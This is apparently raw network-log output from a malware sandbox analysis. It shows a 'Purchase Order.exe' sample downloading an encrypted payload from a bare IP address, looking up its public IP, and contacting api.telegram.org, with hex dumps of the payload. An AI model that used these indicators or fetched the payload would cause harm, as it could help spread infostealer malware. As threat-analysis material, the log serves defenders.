                                                                                                Oct 21, 2024 11:30:32.218166113 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.218178988 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.218192101 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.218203068 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.218280077 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.218280077 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.307374954 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307487965 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.307641029 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307652950 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307662964 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307673931 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307686090 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.307712078 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.307749033 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.308557034 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.308598042 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.308608055 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.308675051 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.308675051 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.334534883 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.334741116 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.334752083 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.334763050 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.334774971 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.334867954 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.334918022 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.335167885 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.335179090 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.335191965 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.335216045 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.335263014 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.335278988 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.335304022 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.335350990 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.335350990 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.428160906 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428179026 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428189993 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428195000 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428201914 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428210974 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428224087 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428234100 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.428443909 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.428478003 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:32.451708078 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:32.452035904 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:33.041249037 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:33.046389103 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:33.046451092 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:33.046765089 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:33.051672935 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:33.715333939 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:33.719268084 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:33.724351883 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:35.875432968 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:35.926645041 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:35.994040966 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:36.000297070 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.151431084 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.155378103 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:38.160516977 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.328026056 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.379733086 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:38.619349957 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:38.619404078 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.619476080 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:38.633147001 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:38.633166075 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.243922949 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.244071007 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.261390924 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.261414051 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.261683941 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.317285061 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.501043081 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.547400951 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.635610104 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.635711908 CEST44349977188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.636019945 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.640119076 CEST49977443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.647559881 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:39.652503967 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.986489058 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.990123987 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.990165949 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:39.990268946 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.990680933 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:39.990690947 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.036015987 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.598798037 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.601157904 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:40.601186991 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.737344027 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.737442017 CEST44349978188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.737500906 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:40.738017082 CEST49978443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:40.743077040 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.744004965 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.748383045 CEST8049976193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.748437881 CEST4997680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.748914003 CEST8049979193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:40.748991966 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.749135971 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:40.754518032 CEST8049979193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:41.406460047 CEST8049979193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:41.407951117 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:41.408004045 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:41.408173084 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:41.408478975 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:41.408504963 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:41.457981110 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.015150070 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.017303944 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:42.017332077 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.155364037 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.155445099 CEST44349980188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.155874014 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:42.157028913 CEST49980443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:42.159888029 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.161290884 CEST4998180192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.165549040 CEST8049979193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.165635109 CEST4997980192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.166553974 CEST8049981193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:42.166631937 CEST4998180192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.166743040 CEST4998180192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:42.171591043 CEST8049981193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:44.844923973 CEST8049981193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:44.850156069 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:44.855570078 CEST8049982193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:44.855664968 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:44.855762959 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:44.861164093 CEST8049982193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:44.895427942 CEST4998180192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.230880022 CEST8049982193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.232513905 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.232549906 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.232678890 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.232995033 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.233010054 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.286021948 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.844476938 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.846508026 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.846538067 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.983242989 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.983349085 CEST44349983188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.983473063 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.984266043 CEST49983443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:46.988001108 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.988974094 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.995171070 CEST8049982193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.995268106 CEST4998280192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.995629072 CEST8049984193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:46.995716095 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:46.995786905 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:47.003946066 CEST8049984193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:48.290724039 CEST8049984193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:48.308245897 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:48.308315992 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:48.308403969 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:48.308665037 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:48.308677912 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:48.332951069 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:48.915734053 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:48.917538881 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:48.917570114 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:49.059906960 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:49.060004950 CEST44349985188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:49.060080051 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:49.060717106 CEST49985443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:49.064115047 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:49.064765930 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:49.069571018 CEST8049984193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:49.069669962 CEST4998480192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:49.069755077 CEST8049986193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:49.069837093 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:49.069955111 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:49.074979067 CEST8049986193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:51.695322037 CEST8049986193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:51.697130919 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:51.697190046 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:51.697904110 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:51.698266983 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:51.698280096 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:51.739113092 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:52.304912090 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.306662083 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:52.306696892 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.448260069 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.448374987 CEST44349987188.114.97.3192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.448503017 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:52.449157953 CEST49987443192.168.2.5188.114.97.3
                                                                                                Oct 21, 2024 11:30:52.470113993 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:52.475547075 CEST8049986193.122.130.0192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.475862026 CEST4998680192.168.2.5193.122.130.0
                                                                                                Oct 21, 2024 11:30:52.482758999 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:52.482810020 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.482884884 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:52.483330965 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:52.483346939 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.331999063 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.332247019 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:53.334508896 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:53.334521055 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.334760904 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.336282015 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:53.383392096 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.579469919 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.579547882 CEST44349988149.154.167.220192.168.2.5
                                                                                                Oct 21, 2024 11:30:53.579655886 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:30:53.580215931 CEST49988443192.168.2.5149.154.167.220
                                                                                                Oct 21, 2024 11:31:08.487474918 CEST4998180192.168.2.5193.122.130.0
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 21, 2024 11:30:33.024956942 CEST5213353192.168.2.51.1.1.1
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST53521331.1.1.1192.168.2.5
                                                                                                Oct 21, 2024 11:30:38.610124111 CEST4951553192.168.2.51.1.1.1
                                                                                                Oct 21, 2024 11:30:38.618509054 CEST53495151.1.1.1192.168.2.5
                                                                                                Oct 21, 2024 11:30:52.470838070 CEST5032653192.168.2.51.1.1.1
                                                                                                Oct 21, 2024 11:30:52.477684021 CEST53503261.1.1.1192.168.2.5
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 21, 2024 11:30:33.024956942 CEST192.168.2.51.1.1.10x4b3bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:38.610124111 CEST192.168.2.51.1.1.10x33b9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:52.470838070 CEST192.168.2.51.1.1.10x334eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:33.033716917 CEST1.1.1.1192.168.2.50x4b3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:38.618509054 CEST1.1.1.1192.168.2.50x33b9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:38.618509054 CEST1.1.1.1192.168.2.50x33b9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                Oct 21, 2024 11:30:52.477684021 CEST1.1.1.1192.168.2.50x334eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                • reallyfreegeoip.org
                                                                                                • api.telegram.org
                                                                                                • 84.38.129.16
                                                                                                • checkip.dyndns.org
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54997584.38.129.16803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:29.608429909 CEST171OUTGET /efxSlCP242.bin HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                Host: 84.38.129.16
                                                                                                Cache-Control: no-cache
                                                                                                Oct 21, 2024 11:30:30.432154894 CEST1236INHTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Last-Modified: Mon, 21 Oct 2024 00:26:14 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "88918dd64f23db1:0"
                                                                                                Server: Microsoft-IIS/8.5
                                                                                                Date: Mon, 21 Oct 2024 09:30:28 GMT
                                                                                                Content-Length: 274496
                                                                                                Data Raw: d8 50 07 a2 d0 58 60 43 5a b2 3d cb 45 29 38 5c 2e ee 99 b7 dc 33 7a 1a 9a 15 9e f0 44 e3 6a c9 c6 52 36 56 39 35 31 b4 de 56 79 31 32 47 76 c8 79 37 21 74 d4 e1 94 d6 1f 80 8d 98 ae ff 56 a6 66 42 9d b0 71 b8 ea 9a 29 7c ad f5 91 b4 a8 fa 9e 67 f0 8c d8 fc 49 0c 63 f5 11 8b f7 c4 c1 f5 c0 af 95 93 d9 32 82 90 8c b8 94 d8 43 b1 b6 82 68 b5 cf 43 ce e7 78 41 63 77 eb 54 45 50 dc 98 fa d7 2d 0c 5a a4 b1 66 20 6c 8b 97 ea 14 4e 1f a0 e4 70 32 a6 1a 0c 68 83 27 6b e7 ec 62 30 cf 09 6d 52 1f ee 5e 39 c2 d7 d7 0b ac c1 32 c5 1f bc 37 e9 0d 2b 9c 68 60 66 6f e2 a5 f5 12 bf 3d 2f 0b 63 ca 1e 9c 5f eb 18 9a 11 cd 57 70 bb f1 6c 6a 3c b4 78 ec 0e 55 e4 b7 7e 22 1f e7 d7 f7 cb b8 af 13 15 e8 6e d7 cb 2a 27 56 d7 75 6f 93 7f 00 7a 2f 06 e3 8f a1 1a 20 ce 0f 3a ce a3 d8 56 c4 f6 1f cd ab b5 c9 c2 d7 2d da 99 f3 c1 69 71 fc ac 6c 51 2a 46 3e 83 0d 8a 88 ba 92 aa b0 41 ce ce 06 8e 76 8c 21 09 21 fa ce 40 48 72 6b 2e 5b a3 6f 4d 8c cd fc 73 50 1f 01 7d 62 e4 07 1c c0 b1 2b f2 0f 46 3b d4 df a0 7e 19 0d 44 8e f5 4f [TRUNCATED]
                                                                                                Data Ascii: PX`CZ=E)8\.3zDjR6V951Vy12Gvy7!tVfBq)|gIc2ChCxAcwTEP-Zf lNp2h'kb0mR^927+h`fo=/c_Wplj<xU~"n*'Vuoz/ :V-iqlQ*F>Av!!@Hrk.[oMsP}b+F;~DOw[,58Pi-g/PN;,CY.9~MF1d,q-r}J]nZgSMzSxBR,9J5Us`tO`bw.6Vs6&6p(S@$Ts8D(.o3)w^5u/<^4z(QU9PDrv1@i6byJc/:@{lR+\Q;y7{Le.q5hgblM_w,"XF|HK1GNKH}:DQ~bHgMhw;MG"kGgQ[:2bx;2md;?hIEAM4l4er;cDaQgO9e9,ghZ[0R>SN0="X11Y)q!ZxJ1.@M"[r3d`m.<VI)Z8v+N6T(5Qg8@BI@L
                                                                                                Oct 21, 2024 11:30:30.432182074 CEST1236INData Raw: d7 ba 0d 70 6f 2b a3 ed 0d 69 76 7d 94 64 fe 5e 7d 76 a3 8c ba 73 a3 dd ba 75 cd 56 1c 54 33 23 3b cb 4f 82 d0 3f 6c 6a d0 42 47 4b 3c a3 a6 bc 7e a1 34 6e 5b da 35 f3 6e 87 9f 15 21 e1 e1 b7 66 c1 79 92 54 63 c4 32 8f d3 d2 93 17 ac 1c 29 c4 8e
                                                                                                Data Ascii: po+iv}d^}vsuVT3#;O?ljBGK<~4n[5n!fyTc2)04J/QO jA`r?H3DK\`ILup{`32nJ:qCsf5&XwAPKGX_-Wi60&\^v308T
                                                                                                Oct 21, 2024 11:30:30.432193041 CEST1236INData Raw: 50 3b 69 fc 37 b4 b2 7b fa c8 15 60 02 c3 9e 85 3b f0 4c be 15 15 32 65 28 5b bd 95 34 05 64 67 ab 62 a5 ef 91 a0 e1 d3 ec fa 4b 94 fd b3 57 a0 4e ba 58 da 31 45 ae 8a 48 77 a0 08 4b 59 1d 64 ef 7d 17 e8 12 69 aa 17 02 0a 55 22 eb 21 fa e1 b2 a3
                                                                                                Data Ascii: P;i7{`;L2e([4dgbKWNX1EHwKYd}iU"!bHzAAJD_If;M"mGewj[$]l:sm3E\N.Lq5`M0OM4E/>hGG"DxAhhWS,0/k8
                                                                                                Oct 21, 2024 11:30:30.432209969 CEST1236INData Raw: 1a 00 c8 8f 78 cc a3 dc 20 8f f0 1f bd d5 99 c9 c6 d3 05 8a 99 f3 c7 e9 32 7c a8 68 23 45 40 3e f3 73 a6 88 b8 96 c2 65 41 ce d8 86 ca 66 8c 25 7b a4 ec ce 30 26 5e 6b 2e 5f 8b 3f 5d 8c cb 7c 36 50 1f 05 0f c3 e2 07 0c 86 99 2b b9 0b 6e 6b d4 9f
                                                                                                Data Ascii: x 2|h#E@>seAf%{0&^k._?]|6P+nkHDq+R8P,i)_|f;d1_9VKF1`^JwS^}J1]h}^DTMxX&+b2R0+h't.zbr^w4&6P8}'t
                                                                                                Oct 21, 2024 11:30:30.432223082 CEST848INData Raw: e9 83 af 06 47 3b 75 6b 08 af cd 65 0c 81 77 d0 be b8 54 5c 4f 46 2f b1 8e 42 ed 80 47 03 be 93 23 42 e3 5a aa 60 e8 e8 52 69 76 fb 9e d9 10 6c 20 8e 46 82 41 1a 71 97 64 c1 42 27 cc ee 78 e7 45 08 7a 37 80 43 1c c6 93 64 6b 96 1e 6d 42 01 e1 80
                                                                                                Data Ascii: G;ukewT\OF/BG#BZ`Rivl FAqdB'xEz7CdkmB8~0E1<\+r/F}2x[/tm%@s~l=7,]F(sTYV+alK$(gXL+2C\hC
                                                                                                Oct 21, 2024 11:30:30.547195911 CEST1236INData Raw: 68 87 32 b3 cd 48 56 fd 15 ff 75 fd 47 bd 37 6b f7 9f df 47 8c 89 67 cc 5b 60 29 55 a3 24 78 32 8b 62 e0 19 9d b2 c3 cd c9 96 a9 78 e0 28 c2 66 47 4b c4 b4 b8 2c 4d fb 3b b8 46 85 46 e0 be 3f 61 1c f8 3d 36 65 47 46 f1 93 d5 c9 90 3e cf ed 7e 06
                                                                                                Data Ascii: h2HVuG7kGg[`)U$x2bx(fGK,M;FF?a=6eGF>~n>oQbc@GkC&I3+80zVkx Ic2l0a9{!X9g`!u7&&x0K*Ag5~7d4m5<DI5@yco4`+z
